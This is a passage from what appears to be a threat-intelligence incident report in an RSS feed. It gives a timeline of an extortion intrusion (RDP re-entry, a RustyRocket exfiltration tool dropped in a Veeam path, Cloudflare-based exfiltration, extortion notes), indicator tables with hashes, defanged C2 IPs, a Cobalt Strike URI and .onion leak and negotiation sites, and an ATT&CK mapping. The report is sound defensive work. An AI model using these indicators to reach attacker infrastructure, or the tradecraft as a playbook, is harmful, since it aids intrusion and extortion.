&lt;td&gt;Day 1&lt;/td&gt;
&lt;td&gt;Threat actor kicked out&lt;/td&gt;
&lt;td&gt;Threat actor removed from network&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 05:57&lt;/td&gt;
&lt;td&gt;RDP back in&lt;/td&gt;
&lt;td&gt;Administrator from 45.227.254[.]128 to entry workstation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 05:59&lt;/td&gt;
&lt;td&gt;RDP to backup server&lt;/td&gt;
&lt;td&gt;Administrator, first host accessed on Day 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 05:59&lt;/td&gt;
&lt;td&gt;Veeam console opened&lt;/td&gt;
&lt;td&gt;Browsed backup jobs, checked for virtualized infrastructure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:06&lt;/td&gt;
&lt;td&gt;Ping infrastructure&lt;/td&gt;
&lt;td&gt;45.227.254[.]128 + 45.227.253[.]139 from backup server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:24&lt;/td&gt;
&lt;td&gt;RDP reconnect to DC&lt;/td&gt;
&lt;td&gt;Type 7 reconnect, Day 1 session still active&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:42&lt;/td&gt;
&lt;td&gt;SSH attempts (failed)&lt;/td&gt;
&lt;td&gt;lactenin.exe to file server, 4 attempts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:45&lt;/td&gt;
&lt;td&gt;agent.zip downloaded&lt;/td&gt;
&lt;td&gt;Chrome on DC, source: temp[.]sh&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:47&lt;/td&gt;
&lt;td&gt;agent.exe dropped on DC&lt;/td&gt;
&lt;td&gt;&lt;code&gt;C:\ProgramData\Veeam\&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:48&lt;/td&gt;
&lt;td&gt;agent.exe executed on DC&lt;/td&gt;
&lt;td&gt;NORMAL mode, stdin config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:49&lt;/td&gt;
&lt;td&gt;DC exfil begins&lt;/td&gt;
&lt;td&gt;First HTTPS 443 to Cloudflare&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:52&lt;/td&gt;
&lt;td&gt;DC SMB sweep&lt;/td&gt;
&lt;td&gt;10 hosts over 445 in 8 minutes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:55&lt;/td&gt;
&lt;td&gt;agent.exe to backup server&lt;/td&gt;
&lt;td&gt;SMB copy to legitimate Veeam path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:56&lt;/td&gt;
&lt;td&gt;agent.exe executed on backup&lt;/td&gt;
&lt;td&gt;Second instance, NORMAL mode&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 06:57&lt;/td&gt;
&lt;td&gt;Backup exfil begins&lt;/td&gt;
&lt;td&gt;3,456 HTTPS connections, 3,460 unique IPs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 07:49&lt;/td&gt;
&lt;td&gt;Extortion notes begin&lt;/td&gt;
&lt;td&gt;Backup server via SMB C$&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 07:49-08:18&lt;/td&gt;
&lt;td&gt;Notes on workstations&lt;/td&gt;
&lt;td&gt;7 workstations, name by name&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, 08:57&lt;/td&gt;
&lt;td&gt;Final note on DC&lt;/td&gt;
&lt;td&gt;Domain admin desktop&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Day 2, continued&lt;/td&gt;
&lt;td&gt;HTTPS exfil&lt;/td&gt;
&lt;td&gt;6,900+ Cloudflare IPs until eviction&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div&gt;&lt;/div&gt;
&lt;h2&gt;Indicators&lt;/h2&gt;
&lt;h3&gt;Hashes&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;File&lt;/th&gt;
&lt;th&gt;SHA256&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;lactenin.exe&lt;/td&gt;
&lt;td&gt;&lt;code&gt;a80f5c877ccc7fa71b9de1eb9bd82f9525f1ab282d15c4b4beaffabbf3064c31&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Go, masquerading as Edge Update&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;agent.exe&lt;/td&gt;
&lt;td&gt;&lt;code&gt;743f9dbb32f86322c5f55f1e9051c5cd88092f10adcdac45aa648ac06e229b8a&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Rust, RustyRocket exfil tool&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;IPs&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;IP&lt;/th&gt;
&lt;th&gt;Port&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;45.227.254[.]128&lt;/td&gt;
&lt;td&gt;3389&lt;/td&gt;
&lt;td&gt;External RDP source, SBSSRV&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;195.66.213[.]218&lt;/td&gt;
&lt;td&gt;4381&lt;/td&gt;
&lt;td&gt;lactenin.exe C2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;45.227.253[.]139&lt;/td&gt;
&lt;td&gt;31822&lt;/td&gt;
&lt;td&gt;Cobalt Strike HTTP beacon, URI /8qiJ&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3&gt;Domains&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Domain&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;temp[.]sh&lt;/td&gt;
&lt;td&gt;Tool hosting (lactenin.zip + agent.zip)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;vw6vklsuotptwdbiwqfvd7y4b57wdbfm6ypxduzzgbt62snti6jm76yd[.]onion&lt;/td&gt;
&lt;td&gt;Negotiation portal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;worldleaksartrjm3c6vasllvgacbi5u3mgzkluehrzhk2jz4taufuid[.]onion&lt;/td&gt;
&lt;td&gt;Leak site&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div&gt;&lt;/div&gt;
&lt;h2&gt;MITRE ATT&amp;amp;CK&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tactic&lt;/th&gt;
&lt;th&gt;Technique&lt;/th&gt;
&lt;th&gt;Detail&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Initial Access&lt;/td&gt;
&lt;td&gt;T1078 Valid Accounts&lt;/td&gt;
&lt;td&gt;Administrator RDP brute forced from 45.227.254[.]128&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1562.001 Impair Defenses&lt;/td&gt;
&lt;td&gt;privacy.sexy, 110 commands, TrustedInstaller&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defense Evasion&lt;/td&gt;
&lt;td&gt;T1036.005 Masquerading&lt;/td&gt;
&lt;td&gt;Edge Update installer + Veeam directory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credential Access&lt;/td&gt;
&lt;td&gt;T1552.001 Credentials In Files&lt;/td&gt;
&lt;td&gt;Harvested domain accounts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral Movement&lt;/td&gt;
&lt;td&gt;T1021.001 RDP&lt;/td&gt;
&lt;td&gt;Entry workstation to DC and workstations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral Movement&lt;/td&gt;
&lt;td&gt;T1021.004 SSH&lt;/td&gt;
&lt;td&gt;lactenin.exe to file server (failed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Lateral Movement&lt;/td&gt;
&lt;td&gt;T1021.002 SMB/Admin Shares&lt;/td&gt;
&lt;td&gt;Tool distribution + C$ access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;T1071.001 Web Protocols&lt;/td&gt;
&lt;td&gt;lactenin.exe 195.66.213[.]218:4381 + CS 45.227.253[.]139:31822&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Command and Control&lt;/td&gt;
&lt;td&gt;T1059.001 PowerShell&lt;/td&gt;
&lt;td&gt;Cobalt Strike stager in process memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration&lt;/td&gt;
&lt;td&gt;T1567 Exfiltration Over Web Service&lt;/td&gt;
&lt;td&gt;6,900+ Cloudflare IPs over 443&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Exfiltration&lt;/td&gt;
&lt;td&gt;T1039 Data from Network Shares&lt;/td&gt;
&lt;td&gt;agent.exe SMB 445 sweep of all hosts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impact&lt;/td&gt;
&lt;td&gt;T1486 Data for Impact&lt;/td&gt;
&lt;td&gt;Personalized extortion notes per user&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;T. Ryan Whelan (Accenture), Rusty Rocket Overview - &lt;a href=&quot;https://www.linkedin.com/posts/t-ryan-whelan-1156ab5_rusty-rocket-overview-activity-7427362471729995776-wgmI&quot;&gt;https://www.linkedin.com/posts/t-ryan-whelan-1156ab5_rusty-rocket-overview-activity-7427362471729995776-wgmI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Microsoft Security Blog, Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction, October 2023 - &lt;a href=&quot;https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/&quot;&gt;https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded><category>Extortion</category><category>Data Exfiltration</category><category>RDP</category><category>Cobalt Strike</category></item></channel></rss>